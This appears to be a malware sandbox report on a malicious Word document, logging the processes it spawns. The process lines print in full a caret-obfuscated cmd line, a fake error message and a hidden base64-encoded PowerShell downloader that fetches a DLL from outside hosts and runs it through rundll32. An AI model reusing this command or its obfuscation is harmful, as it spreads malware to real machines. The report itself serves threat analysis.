Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j.....U................u.............}..v....@V......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v.....]......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j.....]................u.............}..v....@^......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v.....e......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j.....e................u.............}..v....@f......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v.....m......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j.....m................u.............}..v....@n......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v.....u......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j.....u................u.............}..v....@v......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'................3.j.....LY...............u.............}..v.....}......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'................2.j.....}................u.............}..v....@~......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............U.3.5.R.=.(.'.C.6.'.+.'.5.B.'.)...u.............}..v............0.N.............HIY..... .......l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j......................u.............}..v.... .......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j......................u.............}..v............0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v....P.......0.N.....................r.......l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j......................u.............}..v............0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ ........3.j.....LY...............u.............}..v............0.N.............HIY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j......................u.............}..v....P.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................u.............}..v....._......0.N...............Y.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....E.h...............u.............}..v....h.......0.N...............Y.............l...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString

Source: MENSAJE.doc

Virustotal: Detection: 61%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',xwmmryHmiBrcQ
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',LiprInkL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',ZlOVOPTFkFCSlH
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',dHWvVgE
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',XiceWXom
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',#1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',xwmmryHmiBrcQ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',LiprInkL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',ZlOVOPTFkFCSlH	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',dHWvVgE	Jump to behavior
